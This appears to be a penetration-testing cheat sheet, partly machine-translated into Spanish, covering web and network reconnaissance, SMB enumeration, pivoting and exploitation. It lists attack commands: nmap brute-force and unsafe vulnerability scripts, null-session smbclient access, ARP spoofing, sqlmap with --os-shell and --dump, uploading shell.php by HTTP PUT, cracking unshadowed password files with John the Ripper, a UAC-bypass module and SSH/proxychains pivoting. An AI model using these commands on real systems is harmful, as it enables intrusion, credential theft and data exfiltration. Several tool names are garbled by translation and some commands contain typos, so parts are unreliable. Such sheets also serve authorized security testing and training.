Pentesting Methodology

• Identificar servidor web y tecnologías

• Subdominios de fuerza bruta

  • Sublist3r
  • Golpear
  • Acumular
  • Subrute
  • dnsrecon

• Enumeración de directorio

  • directorio
  • engañado
  • directora
  • fFUF
  • Nikto

• Encuentre usuarios, correos electrónicos filtrados, IDS, etc.

• Siempre intente /robots..txt,/sitemap.xml./crossdomain.xml

• Dorking de Google

  site: puede usar este comando para incluir solo resultados en un nombre de host dado.

  intitle: Este comando se filtra de acuerdo con la página de título.

  inurl: Similar a Intitle pero funciona en la URL de un recurso.

  filetype: este se filtra mediante la extensión del archivo de un recurso.

  AND, OR, &, | Uso de operadores lógicos para combinar expresiones.

• URLS Wayback

ip route - prints the routing table for the host you are on

ip route add ROUTETO via ROUTEFROM - add a route to a new network if on a switched network and you need to pivot

• Uso del material que se encuentra en la máquina. El archivo hosts o la memoria caché ARP, por ejemplo

• Uso de herramientas preinstaladas

• Uso de herramientas compiladas estáticamente

• Uso de técnicas de secuencias de comandos

• Uso de herramientas locales a través de un proxy

  arp -a (can be used to check the arp cache of the machine)

  nano /etc/hosts (on linux, static mappings may be found)

  /etc/resolv.conf (on Linux, may identify any local DNS servers, which may be misconfigured to allow a DNS zone transfer attack)

  nmcli dev show (reading resolve.conf)

  C:WindowsSystem32driversetchosts (On windows)

  ipconfig /all (Check the DNS servers for an interface)

 - /etc/proxychains.conf 
[proxylist] & [proxy_dns]

sock4[5] 127.0.0.1 <port>

proxychains telnet 172.16.0.100 23

ip route add 192.168.72.23 via 10.10.10.10(VPN Gateway)

ip route add 192.168.72.0/24 via 10.10.10.10(VPN Gateway)

fping -a -g 10.10.10.0/24 2>/dev/null

nmap -sn 10.10.10.0/24

nmap -sC -sV -p- <IP>

nmap -sU -sV <IP>

 nc -v 10.10.10.10 port
HEAD / HTTP/1.0

 openssl s_client -connect 10.10.10.10:443
HEAD / HTTP/1.0

 httprint -P0 -h 10.10.10.10 -s /path/to/signaturefile.txt

 GET, POST, HEAD, PUT, DELETE, OPTIONS

 nc 10.10.10.10 80
OPTIONS / HTPP/1.0

 wc -m shell.php
x shell.php

PUT /shell.php
Content-type: text/html
Content-length: x
Directory and File Scanning

nmblookup -A <target IP> - netbios a través del cliente TCP/IP utilizado para buscar nombres de NetBios

nbtstat -A <IP> - (Windows) Muestra protocolos satísticos y conexiones TCP/IP actuales usando NBT

net view <target ip> - Herramienta para la administración de Samba y servidores CIFS remotos

exlpoit/windows/localbypassuac - (módulo de metasploit) Windows UAC Protection bypass

 <20> record tells us that the file sharing service is up and running

 enum4linux -a 10.10.10.10

enum4linux -S(enumerate shares) X.X.X.X

enum4linux -U(enumerate users) X.X.X.X

enum4linux -P(check password policy) X.X.X.X

 nmap -script=smb-enum-shares

nmap -script=smb-enum-users

nmap -script=smb-brute

nmap --script smb-check-vulns.nse --script-args=unsafe-1 

exlpoit/windows/localbypassuac

 -L - allows you to look at what services are avaliable on a target. prepend //<IP ADDRESS>

-N - forces the tool to not ask for a password 

smbclient [-U username] [-P password or -N for no password] -L \\X.X.X.X

smbclient [-U username] [-P password or -N for no password] \\X.X.X.X\share

smbclient -L //10.10.10.10 -N (list shares)

smbclient //10.10.10.10/share -N (mount share)

smbclient //X.X.X.X/IPC$ -N 

 echo 1 > /proc/sys/net/ipv4/ip_forward

arpspoof -i <interface> -t <target> -r <host>

 sqlmap -u <URL> -p <injection parameter> [options]

sqlmap -u http://10.10.10.10 -p parameter

sqlmap -u http://10.10.10.10  --data POSTstring -p parameter

sqlmap -u http://10.10.10.10 --os-shell

sqlmap -u http://10.10.10.10 --dump

--cookie (specifiying cookie)

 update <table> set <parameter>="yes" where <Parameter>="<data";

Esto prepara un archivo para usar con John the Ripper

 unshadow passwd shadow > unshadow

 john -wordlist /path/to/wordlist -users=users.txt hashfile

 scp <user>@<ip>/etc/passwd .

user() Devuelve el nombre del usuario actualmente utilizando la base de datos

substring() devuelve una subcadena de un argumento dado. Se necesitan tres parámetros: la cadena de entrada, la posición de la subcadena y su longitud

Use of Metasploit - (portfwd) -h

 Port forwarding is accomplished with the -L switch, which creates a link to a Local port.

ssh -L 8000:172.16.0.10:80 [email protected] -fN 

-f fondos del shell, -n le dice a SSH que no necesita ejecutar ningún comando, solo configuración de conexión

 Proxies are made using the -D switch, for example: -D 1337

ssh -D 1337 [email protected] -fN 

Esto nuevamente usa los interruptores -fn para obtener el fondo de la carcasa. La elección del puerto 1337 es completamente arbitraria: todo lo que importa es que el puerto esté disponible y configurado correctamente en su archivo de configuración proxychains (o equivalente). Tener este proxy configurado nos permitiría enrutar todo nuestro tráfico en la red de destino.